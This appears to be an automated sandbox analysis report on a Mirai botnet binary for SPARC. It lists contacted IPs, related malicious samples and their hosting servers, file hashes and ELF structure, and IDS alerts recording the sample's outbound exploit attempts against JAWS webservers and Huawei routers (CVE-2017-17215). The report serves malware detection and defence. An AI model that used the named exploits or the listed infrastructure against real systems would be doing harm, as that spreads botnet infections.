                      197.131.5.169
                      unknownMorocco
                      6713IAM-ASMAfalse
                      179.38.175.181
                      unknownArgentina
                      22927TelefonicadeArgentinaARfalse
                      197.16.236.39
                      unknownTunisia
                      37693TUNISIANATNfalse
                      197.89.172.76
                      unknownSouth Africa
                      10474OPTINETZAtrue
                      197.57.39.63
                      unknownEgypt
                      8452TE-ASTE-ASEGfalse
                      132.155.210.165
                      unknownFinland
                      55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                      186.108.245.103
                      unknownArgentina
                      7303TelecomArgentinaSAARfalse
                      47.135.131.124
                      unknownUnited States
                      20115CHARTER-20115USfalse
                      111.5.54.23
                      unknownChina
                      24445CMNET-V4HENAN-AS-APHenanMobileCommunicationsCoLtdCNfalse
                      144.199.76.102
                      unknownMalaysia
                      3918SHELL-3918ShellInformationTechnologyInternationalBVfalse
                      170.81.63.8
                      unknownBrazil
                      266401CNANETBRfalse
                      182.76.203.207
                      unknownIndia
                      9498BBIL-APBHARTIAirtelLtdINfalse
                      156.0.172.199
                      unknownSouth Africa
                      328112Linux-Based-Systems-Design-ASZAfalse
                      65.22.76.208
                      unknownUnited States
                      12041AS-AFILIAS1USfalse
                      85.169.87.190
                      unknownFrance
                      21502ASN-NUMERICABLEFRfalse
                      161.102.37.162
                      unknownUnited States
                      7582UMAC-AS-APUniversityofMacauMOfalse
                      83.164.244.164
                      unknownAustria
                      35369LINZAG-TELEKOM-ASATfalse
                      1.171.99.59
                      unknownTaiwan; Republic of China (ROC)
                      3462HINETDataCommunicationBusinessGroupTWfalse
                      182.39.179.123
                      unknownChina
                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                      204.97.148.165
                      unknownUnited States
                      3931LOGICALUSfalse
                      89.103.41.97
                      unknownCzech Republic
                      6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
                      132.9.224.161
                      unknownUnited States
                      385AFCONC-BLOCK1-ASUSfalse
                      95.252.24.41
                      unknownItaly
                      3269ASN-IBSNAZITfalse
                      51.3.119.58
                      unknownUnited States
                      2686ATGS-MMD-ASUSfalse
                      197.49.55.244
                      unknownEgypt
                      8452TE-ASTE-ASEGfalse
                      100.154.178.237
                      unknownUnited States
                      21928T-MOBILE-AS21928USfalse
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      156.222.129.76Lmck6LFSzS.elfGet hashmaliciousMirai, MoobotBrowse
                        102.134.216.120ApOzONtUOd.elfGet hashmaliciousMiraiBrowse
                          yBfvjcdv6U.elfGet hashmaliciousMiraiBrowse
                            Y1Km1Op9OjGet hashmaliciousMiraiBrowse
                              216.62.129.139xd.arm.elfGet hashmaliciousMiraiBrowse
                                197.166.142.73bot.x86.elfGet hashmaliciousMiraiBrowse
                                  nullnet_load.arm.elfGet hashmaliciousMiraiBrowse
                                    Hilix.armGet hashmaliciousMiraiBrowse
                                      156.114.21.28Vrd6984wHvGet hashmaliciousMiraiBrowse
                                        41.145.154.9100DZy4GniZ.elfGet hashmaliciousMiraiBrowse
                                          beqcVM1zoR.elfGet hashmaliciousMiraiBrowse
                                            x4Jyl944RK.elfGet hashmaliciousMirai, MoobotBrowse
                                              k2O9S4yYbT.elfGet hashmaliciousMiraiBrowse
                                                bk.arm4.elfGet hashmaliciousMiraiBrowse
                                                  Ibt1CP1pqoGet hashmaliciousMiraiBrowse
                                                    armv4lGet hashmaliciousMiraiBrowse
                                                      GQ79WvadYrGet hashmaliciousMiraiBrowse
                                                        VGi1EK6T17Get hashmaliciousMiraiBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          raw.igxhost.rumain_x86.elfGet hashmaliciousMiraiBrowse
                                                          • 154.213.189.14
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          Comsol-Networks-ASZAarm.elfGet hashmaliciousUnknownBrowse
                                                          • 102.134.216.129
                                                          arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 102.134.216.112
                                                          pjyhwsdgkl.elfGet hashmaliciousUnknownBrowse
                                                          • 102.134.216.155
                                                          i586.elfGet hashmaliciousMiraiBrowse
                                                          • 102.134.216.148
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 102.134.216.150
                                                          arm-20241006-0950.elfGet hashmaliciousMiraiBrowse
                                                          • 102.134.216.110
                                                          arm6-20240814-0111.elfGet hashmaliciousMiraiBrowse
                                                          • 102.134.216.116
                                                          o85sjrF5oi.elfGet hashmaliciousUnknownBrowse
                                                          • 102.134.216.156
                                                          arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 102.134.216.128
                                                          qWLVwpwiVS.elfGet hashmaliciousUnknownBrowse
                                                          • 102.134.216.123
                                                          WINDSTREAMUSjackmyx86.elfGet hashmaliciousMiraiBrowse
                                                          • 98.19.174.130
                                                          jackmymips.elfGet hashmaliciousMiraiBrowse
                                                          • 98.19.174.108
                                                          botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 184.80.220.254
                                                          res.arm5.elfGet hashmaliciousUnknownBrowse
                                                          • 66.160.8.127
                                                          res.sh4.elfGet hashmaliciousUnknownBrowse
                                                          • 64.198.241.91
                                                          res.spc.elfGet hashmaliciousUnknownBrowse
                                                          • 66.251.54.249
                                                          res.mpsl.elfGet hashmaliciousUnknownBrowse
                                                          • 75.93.152.59
                                                          botx.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 74.9.18.120
                                                          x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 207.94.133.244
                                                          ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 71.22.0.186
                                                          TE-ASTE-ASEGz0r0.i686.elfGet hashmaliciousMiraiBrowse
                                                          • 156.220.29.221
                                                          jackmysh4.elfGet hashmaliciousMiraiBrowse
                                                          • 156.207.10.193
                                                          jackmyx86.elfGet hashmaliciousMiraiBrowse
                                                          • 197.55.123.252
                                                          jackmymips.elfGet hashmaliciousMiraiBrowse
                                                          • 41.44.233.245
                                                          botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 102.46.222.5
                                                          res.arm.elfGet hashmaliciousUnknownBrowse
                                                          • 41.32.51.102
                                                          telnet.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 156.196.169.243
                                                          botx.spc.elfGet hashmaliciousMiraiBrowse
                                                          • 156.200.238.139
                                                          botx.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 156.221.58.3
                                                          sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 102.43.64.233
                                                          WEBE-MY-AS-APWEBEDIGITALSDNBHDMYsplm68k.elfGet hashmaliciousUnknownBrowse
                                                          • 42.153.221.216
                                                          wanna.ppc.elfGet hashmaliciousMiraiBrowse
                                                          • 180.73.9.107
                                                          g4za.mpsl.elfGet hashmaliciousMiraiBrowse
                                                          • 120.139.14.149
                                                          arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 180.74.192.202
                                                          Fantazy.i686.elfGet hashmaliciousUnknownBrowse
                                                          • 180.74.138.112
                                                          telnet.x86.elfGet hashmaliciousUnknownBrowse
                                                          • 122.255.107.246
                                                          mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 180.73.37.118
                                                          la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                          • 42.153.221.225
                                                          la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 120.139.177.118
                                                          powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 120.139.114.126
                                                          No context
                                                          No context
                                                          No created / dropped files found
                                                          File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
                                                          Entropy (8bit):6.1385072132051555
                                                          TrID:
                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                          File name:z0r0.spc.elf
                                                          File size:74'760 bytes
                                                          MD5:c5ee1e4b1e2c0eeeee0a613084079ee3
                                                          SHA1:a5d90827592166a27f52d632308a8df86468e36a
                                                          SHA256:9c6773a6fcb0568b462363c5c3ac043554b9e3e7439ad771954fc4c3be263650
                                                          SHA512:61153052e33fa12cfa45bae6cfe299ca998782c95655e32778b8c902c9f6374e9c216fe36188e2509cea33586b061d19e27b44ec6f5eb5fcf7bc7d65b3f22c75
                                                          SSDEEP:1536:M68wmSYWGZf51tVtdEZ9v1wh5P5I18aTbC:t30TLuUY1E
                                                          TLSH:02735A25B87A2E13C0E8B47A52B78362B2E6234E34B4865DBD720F8DFF146A02557177
                                                          File Content Preview:.ELF...........................4.."x.....4. ...(.......................................... ... ... ....8............dt.Q................................@..(....@.A.................#.....b8..`.....!..... ...@.....".........`......$ ... ...@...........`....

                                                          ELF header

                                                          Class:ELF32
                                                          Data:2's complement, big endian
                                                          Version:1 (current)
                                                          Machine:Sparc
                                                          Version Number:0x1
                                                          Type:EXEC (Executable file)
                                                          OS/ABI:UNIX - System V
                                                          ABI Version:0
                                                          Entry Point Address:0x101a4
                                                          Flags:0x0
                                                          ELF Header Size:52
                                                          Program Header Offset:52
                                                          Program Header Size:32
                                                          Number of Program Headers:3
                                                          Section Header Offset:74360
                                                          Section Header Size:40
                                                          Number of Section Headers:10
                                                          Header String Table Index:9
                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                          NULL0x00x00x00x00x0000
                                                          .initPROGBITS0x100940x940x1c0x00x6AX004
                                                          .textPROGBITS0x100b00xb00x108140x00x6AX004
                                                          .finiPROGBITS0x208c40x108c40x140x00x6AX004
                                                          .rodataPROGBITS0x208d80x108d80x15d80x00x2A008
                                                          .ctorsPROGBITS0x320000x120000x80x00x3WA004
                                                          .dtorsPROGBITS0x320080x120080x80x00x3WA004
                                                          .dataPROGBITS0x320180x120180x2200x00x3WA008
                                                          .bssNOBITS0x322380x122380x4700x00x3WA008
                                                          .shstrtabSTRTAB0x00x122380x3e0x00x0001
                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                          LOAD0x00x100000x100000x11eb00x11eb06.17660x5R E0x10000.init .text .fini .rodata
                                                          LOAD0x120000x320000x320000x2380x6a82.92110x6RW 0x10000.ctors .dtors .data .bss
                                                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                                                          Download Network PCAP: filteredfull

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2025-02-04T18:11:17.904083+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155637666.135.17.8780TCP
                                                          2025-02-04T18:11:17.904083+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155637666.135.17.8780TCP
                                                          2025-02-04T18:11:18.206262+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1556618163.191.21.18380TCP
                                                          2025-02-04T18:11:18.206262+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1556618163.191.21.18380TCP
                                                          2025-02-04T18:11:19.378631+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1552314150.158.10.5180TCP
                                                          2025-02-04T18:11:19.378631+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1552314150.158.10.5180TCP
                                                          2025-02-04T18:11:20.211398+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1536874152.23.93.4580TCP
                                                          2025-02-04T18:11:20.211398+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1536874152.23.93.4580TCP
                                                          2025-02-04T18:11:22.184807+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1534772156.229.156.2537215TCP
                                                          2025-02-04T18:11:24.307214+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1537246156.231.87.11137215TCP
                                                          2025-02-04T18:11:24.472665+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1560888195.210.137.3080TCP
                                                          2025-02-04T18:11:24.472665+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1560888195.210.137.3080TCP
                                                          2025-02-04T18:11:25.286765+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1534476177.53.138.24980TCP
                                                          2025-02-04T18:11:25.286765+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1534476177.53.138.24980TCP
                                                          2025-02-04T18:11:25.607889+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.156096041.164.28.937215TCP
                                                          2025-02-04T18:11:29.469291+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154762241.234.231.1537215TCP
                                                          2025-02-04T18:11:29.869023+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1535578197.210.178.6337215TCP
                                                          2025-02-04T18:11:30.300034+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1541028156.246.225.3837215TCP
                                                          2025-02-04T18:11:33.219154+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1548968197.129.25.15137215TCP
                                                          2025-02-04T18:11:36.391381+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154124652.185.24.22880TCP
                                                          2025-02-04T18:11:36.391381+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154124652.185.24.22880TCP
                                                          2025-02-04T18:11:37.055574+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153672841.212.96.5137215TCP
                                                          2025-02-04T18:11:37.674865+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1555456177.82.8.4980TCP
                                                          2025-02-04T18:11:37.674865+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1555456177.82.8.4980TCP
                                                          2025-02-04T18:11:37.738100+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1556422197.186.125.4937215TCP
                                                          2025-02-04T18:11:37.739789+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154059480.99.95.15080TCP
                                                          2025-02-04T18:11:37.739789+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154059480.99.95.15080TCP
                                                          2025-02-04T18:11:37.751324+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154822695.13.149.11480TCP
                                                          2025-02-04T18:11:37.751324+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154822695.13.149.11480TCP
                                                          2025-02-04T18:11:37.773011+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155309441.229.92.7237215TCP
                                                          2025-02-04T18:11:37.784370+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1536720181.156.61.2080TCP
                                                          2025-02-04T18:11:37.784370+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1536720181.156.61.2080TCP
                                                          2025-02-04T18:11:37.788473+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1547592156.232.252.3037215TCP
                                                          2025-02-04T18:11:37.814849+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1533992197.172.1.6237215TCP
                                                          2025-02-04T18:11:37.814924+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155549212.97.179.16280TCP
                                                          2025-02-04T18:11:37.814924+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155549212.97.179.16280TCP
                                                          2025-02-04T18:11:37.822196+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1547426173.206.97.19080TCP
                                                          2025-02-04T18:11:37.822196+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1547426173.206.97.19080TCP
                                                          2025-02-04T18:11:37.870635+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1554460197.212.217.23637215TCP
                                                          2025-02-04T18:11:37.870762+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1545246181.72.225.680TCP
                                                          2025-02-04T18:11:37.870762+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1545246181.72.225.680TCP
                                                          2025-02-04T18:11:37.870945+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1548016197.249.19.1037215TCP
                                                          2025-02-04T18:11:37.895791+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153750041.80.3.18937215TCP
                                                          2025-02-04T18:11:37.910009+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154456441.156.70.10837215TCP
                                                          2025-02-04T18:11:37.989345+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1549706197.159.207.22837215TCP
                                                          2025-02-04T18:11:38.005034+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155750041.229.202.4337215TCP
                                                          2025-02-04T18:11:38.006721+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155232884.59.111.13580TCP
                                                          2025-02-04T18:11:38.006721+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155232884.59.111.13580TCP
                                                          2025-02-04T18:11:38.007948+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153429441.216.131.12537215TCP
                                                          2025-02-04T18:11:38.048196+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1535832197.157.167.23637215TCP
                                                          2025-02-04T18:11:38.054265+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153389275.202.255.13680TCP
                                                          2025-02-04T18:11:38.054265+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153389275.202.255.13680TCP
                                                          2025-02-04T18:11:38.064275+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1543928197.0.255.11137215TCP
                                                          2025-02-04T18:11:38.065878+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1534258139.62.254.10780TCP
                                                          2025-02-04T18:11:38.065878+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1534258139.62.254.10780TCP
                                                          2025-02-04T18:11:38.067721+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154211641.197.212.10537215TCP
                                                          2025-02-04T18:11:38.081694+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153813841.89.103.10037215TCP
                                                          2025-02-04T18:11:38.094935+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1536264156.52.86.1837215TCP
                                                          2025-02-04T18:11:38.095110+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1549594115.185.195.25180TCP
                                                          2025-02-04T18:11:38.095110+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1549594115.185.195.25180TCP
                                                          2025-02-04T18:11:38.118320+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1556890156.221.146.3637215TCP
                                                          2025-02-04T18:11:38.143975+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1546086104.108.17.7180TCP
                                                          2025-02-04T18:11:38.143975+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1546086104.108.17.7180TCP
                                                          2025-02-04T18:11:38.173206+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154845259.197.123.19180TCP
                                                          2025-02-04T18:11:38.173206+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154845259.197.123.19180TCP
                                                          2025-02-04T18:11:38.222179+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1556634148.124.95.17480TCP
                                                          2025-02-04T18:11:38.222179+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1556634148.124.95.17480TCP
                                                          2025-02-04T18:11:38.241306+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1541596204.180.52.5580TCP
                                                          2025-02-04T18:11:38.241306+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1541596204.180.52.5580TCP
                                                          2025-02-04T18:11:38.251144+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1553656116.7.76.2380TCP
                                                          2025-02-04T18:11:38.251144+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1553656116.7.76.2380TCP
                                                          2025-02-04T18:11:38.258956+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1540282122.230.149.11480TCP
                                                          2025-02-04T18:11:38.258956+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1540282122.230.149.11480TCP
                                                          2025-02-04T18:11:38.284637+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153827619.122.225.9180TCP
                                                          2025-02-04T18:11:38.284637+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153827619.122.225.9180TCP
                                                          2025-02-04T18:11:38.286219+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155882019.144.149.11380TCP
                                                          2025-02-04T18:11:38.286219+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155882019.144.149.11380TCP
                                                          2025-02-04T18:11:38.286621+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1537250171.125.195.17480TCP
                                                          2025-02-04T18:11:38.286621+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1537250171.125.195.17480TCP
                                                          2025-02-04T18:11:38.690813+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1532782200.162.125.4980TCP
                                                          2025-02-04T18:11:38.690813+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1532782200.162.125.4980TCP
                                                          2025-02-04T18:11:38.720005+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1539240197.74.8.4937215TCP
                                                          2025-02-04T18:11:38.782754+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1558508106.129.170.23080TCP
                                                          2025-02-04T18:11:38.782754+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1558508106.129.170.23080TCP
                                                          2025-02-04T18:11:38.800248+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155172641.89.186.10337215TCP
                                                          2025-02-04T18:11:38.819742+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1552870156.118.10.7737215TCP
                                                          2025-02-04T18:11:38.878445+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1544592178.15.78.9780TCP
                                                          2025-02-04T18:11:38.878445+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1544592178.15.78.9780TCP
                                                          2025-02-04T18:11:38.878617+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1538764197.153.167.12537215TCP
                                                          2025-02-04T18:11:38.878679+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1542968197.109.186.14937215TCP
                                                          2025-02-04T18:11:38.879968+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153503041.237.200.16437215TCP
                                                          2025-02-04T18:11:38.895338+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1533174148.218.47.16280TCP
                                                          2025-02-04T18:11:38.895338+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1533174148.218.47.16280TCP
                                                          2025-02-04T18:11:38.909554+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1547320197.14.66.1237215TCP
                                                          2025-02-04T18:11:38.913143+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1553500126.88.175.21580TCP
                                                          2025-02-04T18:11:38.913143+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1553500126.88.175.21580TCP
                                                          2025-02-04T18:11:38.925400+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1538698206.18.177.1280TCP
                                                          2025-02-04T18:11:38.925400+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1538698206.18.177.1280TCP
                                                          2025-02-04T18:11:38.972015+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1538780197.109.31.17537215TCP
                                                          2025-02-04T18:11:38.985638+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155396682.32.93.11080TCP
                                                          2025-02-04T18:11:38.985638+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155396682.32.93.11080TCP
                                                          2025-02-04T18:11:38.991513+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154778641.137.229.24780TCP
                                                          2025-02-04T18:11:38.991513+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154778641.137.229.24780TCP
                                                          2025-02-04T18:11:39.048243+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1533700197.133.40.2437215TCP
                                                          2025-02-04T18:11:39.052067+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1549810156.80.186.25337215TCP
                                                          2025-02-04T18:11:39.063736+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1535530156.161.111.24737215TCP
                                                          2025-02-04T18:11:39.067785+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153876041.29.6.12237215TCP
                                                          2025-02-04T18:11:39.069370+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153394813.108.32.21180TCP
                                                          2025-02-04T18:11:39.069370+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153394813.108.32.21180TCP
                                                          2025-02-04T18:11:39.081088+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153783435.149.142.16380TCP
                                                          2025-02-04T18:11:39.081088+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153783435.149.142.16380TCP
                                                          2025-02-04T18:11:39.097298+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1544860156.66.193.9337215TCP
                                                          2025-02-04T18:11:39.126248+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1543492203.195.122.9880TCP
                                                          2025-02-04T18:11:39.126248+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1543492203.195.122.9880TCP
                                                          2025-02-04T18:11:39.220090+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153720267.218.78.19180TCP
                                                          2025-02-04T18:11:39.220090+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153720267.218.78.19180TCP
                                                          2025-02-04T18:11:39.220126+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1556388166.138.238.3580TCP
                                                          2025-02-04T18:11:39.220126+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1556388166.138.238.3580TCP
                                                          2025-02-04T18:11:39.235690+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1543514107.223.216.24080TCP
                                                          2025-02-04T18:11:39.235690+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1543514107.223.216.24080TCP
                                                          2025-02-04T18:11:39.241495+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1549602216.213.46.23180TCP
                                                          2025-02-04T18:11:39.241495+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1549602216.213.46.23180TCP
                                                          2025-02-04T18:11:39.287567+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1540134150.170.24.9080TCP
                                                          2025-02-04T18:11:39.287567+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1540134150.170.24.9080TCP
                                                          2025-02-04T18:11:39.288898+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1541766124.184.212.22780TCP
                                                          2025-02-04T18:11:39.288898+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1541766124.184.212.22780TCP
